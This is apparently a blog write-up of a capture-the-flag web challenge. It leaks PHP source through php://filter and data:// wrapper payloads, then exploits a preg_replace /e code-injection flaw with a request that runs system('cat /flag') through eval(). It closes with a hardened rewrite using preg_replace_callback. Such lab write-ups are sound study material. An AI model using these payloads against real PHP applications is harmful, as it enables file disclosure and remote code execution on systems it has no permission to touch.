BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
2022-04-23 12:27:00 【Y1Daa】
After entering the environment we get the source code:

```php
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
    include($file);  //next.php
}
else{
    highlight_file(__FILE__);
}
?>
```
Construct the payload using PHP wrappers (pseudo-protocols):

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

The response is:

PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K

After base64 decoding:

```php
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}
```
Here we can see that the cmd parameter gives command execution through eval(), but the problem is how to call getFlag(). This relies on the code-execution vulnerability of the preg_replace /e modifier.

```php
function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
```

If the payload is

/?.*={${phpinfo()}}

then the original statement

preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);

becomes

preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

Note: wrapping a regex pattern, or part of it, in ( ) stores the matched string in a temporary buffer. Buffers are numbered from 1, and up to 99 sub-expressions can be stored; each buffer can be referenced as \n, where n is the buffer number. preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}}); stores {${phpinfo()}} in buffer 1. In the replacement string, \\1 is \1, a back-reference to that buffer, so after substitution the replacement reads strtolower("{${phpinfo()}}"). Because of the /e modifier, PHP evaluates the substituted replacement as code, and the ${phpinfo()} expression inside the double-quoted string calls phpinfo(), which is what gives code execution.

In this challenge, PHP converts illegal characters in $_GET parameter names to underscores, so the . in .* is turned into _. The payload can therefore be changed to ?\S*=${getFlag()}&cmd=..., where \S matches any non-whitespace character, which achieves our goal of calling getFlag().
Construct the payload:

?\S*=${getFlag()}&cmd=system('cat /flag');

The response is:

flag{6b53cc7c-e9e8-47a1-80ed-10ca16c81ae5} system('cat /flag');
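As an added defender-side example (not the challenge's or the author's code), here is complex() rewritten without the /e modifier, using preg_replace_callback() so the captured text is handed to a callable instead of being evaluated; the /e modifier itself was deprecated in PHP 5.5 and removed in PHP 7.0, so the challenge depends on a PHP 5 runtime. It assumes PHP 8.0 or later for preg_last_error_msg().

```php
<?php
// Added example, not the challenge's or the author's code: the same
// "lowercase whatever the pattern matched" behaviour as next.php's complex(),
// rewritten without the /e modifier. Assumes PHP >= 8.0 (preg_last_error_msg()).
// preg_replace_callback() hands the match to a real PHP callable, so the matched
// text is only ever data; it is never assembled into a string that gets evaluated.
function complex_safe(string $re, string $str): string {
    // The key is still treated as a regex, as in the challenge. If it were meant
    // to be a literal, wrap it in preg_quote($re, '/') instead.
    $result = preg_replace_callback(
        '/(' . $re . ')/i',
        static function (array $m): string {
            return strtolower($m[1]);
        },
        $str
    );
    // On a malformed pattern (user input still reaches the regex) fail closed
    // instead of silently echoing the untouched input.
    if ($result === null) {
        throw new RuntimeException('regex error: ' . preg_last_error_msg());
    }
    return $result;
}

// Constructed inputs: a benign request, then the writeup's payload shape.
var_dump(complex_safe('ABC', 'xABCx'));        // string(5) "xabcx"
var_dump(complex_safe('.*', '${getFlag()}'));  // string(12) "${getflag()}": lowercased text, nothing called
```

The second call shows the difference: with /e the substituted replacement would have been evaluated, while the callback simply returns the lowercased match as a string.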
Copyright notice
This article was written by [Y1Daa]; please include a link to the original when reposting. Thanks.
https://blog.csdn.net/weixin_51412071/article/details/124351859